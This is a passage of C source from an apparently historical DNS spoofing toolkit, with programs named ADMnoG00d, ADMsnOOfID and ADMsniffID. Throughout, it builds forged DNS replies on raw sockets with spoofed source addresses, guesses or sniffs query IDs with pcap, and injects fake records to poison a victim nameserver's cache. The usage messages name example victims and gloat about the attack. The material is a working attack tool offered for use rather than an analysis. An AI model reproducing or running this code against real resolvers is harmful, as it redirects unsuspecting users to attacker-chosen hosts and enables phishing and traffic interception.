we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n"); printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n"); printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n"); printf(" for more information..\n"); printf(" check ftp.janova.org/pub/ADM/ \n"); printf(" mail ADM@janova.org \n"); printf(" ask Heike from me...:) \n"); exit(-1); } void senddnspkt(s,d_ip,wwwname,ip,dns) int s; u_long d_ip; char *wwwname; char *ip; struct dnshdr *dns; { struct sockaddr_in sin; int i; char buffer[1024]; char *data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); memcpy(buffer,dns,DNSHDRSIZE); if(dns->qr == 0) { i=makepaketQS(data,wwwname,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } else { i=makepaketAW(data,wwwname,ip,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } } void dns_qs_no_rd(s,d_ip,wwwname,ID) int s; u_long d_ip; char *wwwname; int ID; { struct dnshdr *dns; char *data; char buffer[1024]; int i; dns = (struct dnshdr *)buffer; data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); dns->id = htons(ID); dns->qr = 0; dns->rd = 0; /* dont want the recusion !! 
*/ dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,wwwname,TYPE_A); senddnspkt(s,d_ip,wwwname,NULL,dns); } void main(int argc, char **argv) { struct sockaddr_in sin_rcp; struct dnshdr *dns, *dns_recv; char *data, *data2; char buffer2[4000]; char buffer[4000]; char spoofname[255]; char spoofip[255]; char dnstrust[255]; char bla[255]; char *alacon; unsigned char fakename[255]; unsigned char namez[255]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2, trust; unsigned int DA_ID = 65535, loop = 65535; int sraw, s_r, i, on=1, x, ID,timez; int len = sizeof(struct sockaddr); dns_recv = (struct dnshdr *)(buffer); data2 = (char *)(buffer+DNSHDRSIZE); dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); srand(time(NULL)); if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){ perror("socket"); exit(ERROR); } if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){ perror("fcntl"); exit(ERROR); } if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){ perror("setsockopt"); exit(ERROR); } if(argc < 2) usage(); if(argc > 9 )DA_ID = loop = atoi(argv[9]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if( argc > 8 ) strcpy(bla,argv[8]); else{ printf("enter the DNS trust of the victim:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); printf("ADMnoG00d %s\n",VERSION); printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n"); sleep(1); printf("\nLets Play =)!!\n"); /* save some param */ s_ip2 = host2ip(argv[1]); d_ip2 = d_ip = host2ip(argv[4]); trust = host2ip(argv[2]); s_ip = 
host2ip(UNDASPOOF); while(1){ sprintf(fakename,"%i%i%i%i%i%i.%s", myrand(), myrand(), myrand(), myrand(), myrand(), myrand(), argv[3]); sendquestion(s_ip,d_ip,fakename,TYPE_A); /* end of question packet */ bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* here start the spoof anwser */ ID = loop; for(;loop >= ID-10 ;loop--){ dns->id = htons(loop); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,fakename,SPOOFIP,TYPE_A); udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i); } bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* time for test spoof */ dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ /* non recursive ! */ /* we waiting for awnser ... */ while(1){ for(timez=0;timez < TIMEOUT; timez++){ if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 ) { printf("ok whe have the reponse ;)\n"); timez = 0; break; } usleep(10); timez++; } if(timez != 0){ printf("hum no reponse from the NS ressend question..\n"); dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); } else break; } /* ok we have a awnser */ printf("fakename = %s\n",fakename); if(sin_rcp.sin_addr.s_addr == d_ip2 ) if(sin_rcp.sin_port == htons(53) ) { if( dns_recv->qr == 1 ) if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */ printf("try %i < ID < %i \n",ID-10,ID); else{ /* Hoho we have the spoof has worked we have found the right ID ! 
*/ printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop); printf("let's send the spoof...\n"); dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5])); printf("spoof sended ...\n"); exit(0); } } /* end of if (sin_rcp.sin_port == htons(53) ) */ bzero(buffer,sizeof(buffer)); } /* end of while loop */ }/* end of proggies */ <--> <++> ADMIDpack/ADMsnOOfID.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #include #include #define DNSHDRSIZE 12 #define SPOOF "127.0.0.1" #define VERSION "ver 0.6 pub" #define ERROR -1 int ETHHDRSIZE; void main(argc, argv) int argc; char *argv[]; { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char namefake[255]; char buffer2[1024]; char ebuf[255]; char spoofname[255]; char spoofip[255]; char bla[255]; char dnstrust[255]; char *alacon; unsigned long s_ipns; unsigned long d_ip; int sraw, i, on=1, con, ID,DA_ID,type; srand( (time(NULL) % random() * random()) ); if(argc <2){ printf("usage : %s \n",argv[0]); printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. 
now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); exit(0); } if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]); else{ printf("enter the dns trust for the spoof\n"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepaketQS(data2,namefake,TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); printf("Question sended...\n"); printf("Its Time to w8 \n"); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTO_UDP){ printf("[%s:%i 
->",inet_ntoa(ip->saddr),ntohs(udp->source)); printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); } if(ip->protocol == 17 ) if(ip->saddr.s_addr == d_ip ) if(ip->daddr.s_addr == s_ipns ) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0 ) { printf("kewl :)~ we have the packet !\n"); ID = dnsrecv->id ; /* we get the id */ printf("the current id of %s is %d \n",argv[2],ntohs(ID)); DA_ID = ntohs(ID); printf("send the spoof...\n"); dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); printf("spoof sended...\n"); exit(0); } } /* well now we have the ID we cant predict the ID */ } <--> <++> ADMIDpack/ADMsniffID.c #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "ver 0.4 pub" int ETHHDRSIZE; void usage(){ printf("usage : ADMsniffID \n"); printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n"); exit(ERROR); } void main(int argc, char **argv) { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char SPOOFIP[255]; char bla[255]; char spoofname[255];